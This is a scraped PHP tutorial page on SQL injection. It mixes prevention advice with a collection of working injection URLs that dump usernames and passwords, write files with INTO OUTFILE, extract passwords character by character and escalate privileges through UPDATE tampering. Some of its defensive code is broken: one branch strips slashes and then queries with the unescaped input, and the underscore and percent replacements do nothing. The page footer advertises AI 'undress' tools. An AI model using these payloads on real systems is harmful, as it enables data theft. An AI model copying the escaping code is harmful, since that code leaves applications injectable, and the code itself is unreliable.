PHP SQL injection attacks and prevention precautions-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

PHP SQL injection attacks and prevention precautions

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 25, 2016 am 08:52 AM

// supposed input
$name = "ilia'; DELETE FROM users;";
mysql_query("SELECT * FROM users WHERE name='{$name}'");

Copy code

Obviously the last command executed by the database is:

SELECT * FROM users WHERE name=ilia; DELETE FROM users

Copy code

This brings disastrous consequences to the database – all records are deleted.

But if the database you are using is MySQL, then fortunately, the mysql_query() function does not allow you to directly perform such operations (multiple statement operations cannot be performed in a single line), so you can rest assured. If the database used is SQLite or PostgreSQL and supports such a statement, then it will face disaster.

As mentioned above, SQL injection mainly submits unsafe data to the database to achieve the purpose of attack. In order to prevent SQL injection attacks, PHP comes with a function that can process the input string and perform preliminary security processing on the input at the lower level, that is, Magic Quotes. (php.ini magic_quotes_gpc). If the magic_quotes_gpc option is enabled, single quotes, double quotes, and other characters in the input string will be automatically preceded by backslashes.

But Magic Quotes is not a very universal solution, it does not block all potentially dangerous characters, and Magic Quotes is not enabled on many servers. Therefore, we also need to use various other methods to prevent SQL injection.

Many databases provide this input data processing functionality natively. For example, PHP's MySQL operation function has a function called mysql_real_escape_string(), which can escape special characters and characters that may cause database operation errors. This code:

//If Magic Quotes function is enabled
if (get_magic_quotes_gpc()) {
$name = stripslashes($name);
}else{
$name = mysql_real_escape_string($name);
}
mysql_query("SELECT * FROM users WHERE name='{$name}'");

Copy code

Note that when using the database Before using the function, you must check whether Magic Quotes is turned on, just like in the above example, otherwise an error will occur if the process is repeated twice. If MQ is enabled, the added ones need to be removed to get the real data.

In addition to preprocessing the above string-form data, when storing Binary data in the database, you should also pay attention to preprocessing. Otherwise, the data may conflict with the storage format of the database itself, causing the database to crash, data records to be lost, or even the entire database to be lost. Some databases, such as PostgreSQL, provide a function pg_escape_bytea() specially used to encode binary data, which can encode the data similar to Base64.

For example:

// for plain-text data use:
pg_escape_string($regular_strings);
// for binary data use:
pg_escape_bytea($binary_data) ;

Copy code

In another case, such a mechanism should also be used. That is, multi-byte languages such as Chinese, Japanese, etc. that are not supported by the database system itself. Some of them have ASCII ranges that overlap with binary data ranges.

Here we recommend two articles about PHP SQL injection prevention. One is provided by 360 Security, and the other is a PHP SQL injection prevention code collected by the author. It is very powerful and easy to use.

php anti-SQL injection code (provided by 360)
php code to prevent sql injection vulnerability filtering function

However, encoding the data may cause query statements like LIKE abc% to become invalid.

php sql injection implementation(the test code is safe)

The focus of SQL injection is to construct SQL statements. Only by using SQL flexibly statement to construct a new injection string. After studying, I wrote some notes and have them ready for use at any time. I hope you will read the following content first Understand the basic principles of SQL. The code in the notes comes from the Internet. ===Basic part=== Query this table: http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6 http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union union statement: http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/* http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

Export file: http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT statement: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); Construct homepage value: http://jbxue.com', '3')# The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' , '1');

UPDATE statement: I like this thing First understand this SQL

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

Copy code

If this SQL is modified into the following form, then Implemented injection 1: Modify the homepage value to http://jbxue.com', userlevel='3 The SQL statement then becomes

UPDATE user SET password='mypass', homepage='http://jbxue.com', userlevel='3' WHERE id='$id'

Copy code

userlevel as user Level 2: Modify the password value to

mypass)' WHERE username='admin'#

After copying the code

, the SQL statement becomes

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

Copy code

3: Modify the id value to ' OR username='admin' The SQL statement then becomes

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

Copy code

===Advanced section= == Commonly used MySQL built-in functions DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() database() version() SUBSTRING() MID() char() load_file() … Function application UPDATE article SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to angel, decimal

Copy code

http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1 )>char(100) http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

Determine the number and type of fields in the data structure http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

Guess the data table name http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members

Cross-table query to get username and password http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1

Others #Verify the first password http://127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49

===Injection Prevention=== Server aspect magic_quotes_gpc is set to On display_errors is set to Off coding aspect

$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords) ;

Copy code

Numeric type Use intval() to catch and replace string type Add single quotes to SQL statement parameters The following code is used to prevent injection

if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace("_","_",$keywords );
$keywords = str_replace("%","%",$keywords);
}

Copy code

Useful functions stripslashes() get_magic_quotes_gpc() mysql_real_escape_string() strip_tags() array_map() addslashes()

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055523 fails to install in Windows 11?

4 weeks ago By DDD

How to fix KB5055518 fails to install in Windows 10?

4 weeks ago By DDD

Roblox: Grow A Garden - Complete Mutation Guide

2 weeks ago By DDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

How to fix KB5055612 fails to install in Windows 10?

3 weeks ago By DDD

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Java Tutorial

1663

CakePHP Tutorial

1420

Laravel Tutorial

1313

PHP Tutorial

1266

C# Tutorial

1239

Related knowledge

Explain different error types in PHP (Notice, Warning, Fatal Error, Parse Error). Apr 08, 2025 am 12:03 AM

There are four main error types in PHP: 1.Notice: the slightest, will not interrupt the program, such as accessing undefined variables; 2. Warning: serious than Notice, will not terminate the program, such as containing no files; 3. FatalError: the most serious, will terminate the program, such as calling no function; 4. ParseError: syntax error, will prevent the program from being executed, such as forgetting to add the end tag.

PHP and Python: Comparing Two Popular Programming Languages Apr 14, 2025 am 12:13 AM

PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.

Explain secure password hashing in PHP (e.g., password_hash, password_verify). Why not use MD5 or SHA1? Apr 17, 2025 am 12:06 AM

In PHP, password_hash and password_verify functions should be used to implement secure password hashing, and MD5 or SHA1 should not be used. 1) password_hash generates a hash containing salt values to enhance security. 2) Password_verify verify password and ensure security by comparing hash values. 3) MD5 and SHA1 are vulnerable and lack salt values, and are not suitable for modern password security.

PHP in Action: Real-World Examples and Applications Apr 14, 2025 am 12:19 AM

PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.

What are HTTP request methods (GET, POST, PUT, DELETE, etc.) and when should each be used? Apr 09, 2025 am 12:09 AM

HTTP request methods include GET, POST, PUT and DELETE, which are used to obtain, submit, update and delete resources respectively. 1. The GET method is used to obtain resources and is suitable for read operations. 2. The POST method is used to submit data and is often used to create new resources. 3. The PUT method is used to update resources and is suitable for complete updates. 4. The DELETE method is used to delete resources and is suitable for deletion operations.

PHP: A Key Language for Web Development Apr 13, 2025 am 12:08 AM

PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7

Explain the difference between self::, parent::, and static:: in PHP OOP. Apr 09, 2025 am 12:04 AM

In PHPOOP, self:: refers to the current class, parent:: refers to the parent class, static:: is used for late static binding. 1.self:: is used for static method and constant calls, but does not support late static binding. 2.parent:: is used for subclasses to call parent class methods, and private methods cannot be accessed. 3.static:: supports late static binding, suitable for inheritance and polymorphism, but may affect the readability of the code.

How does PHP handle file uploads securely? Apr 10, 2025 am 09:37 AM

PHP handles file uploads through the $\_FILES variable. The methods to ensure security include: 1. Check upload errors, 2. Verify file type and size, 3. Prevent file overwriting, 4. Move files to a permanent storage location.

See all articles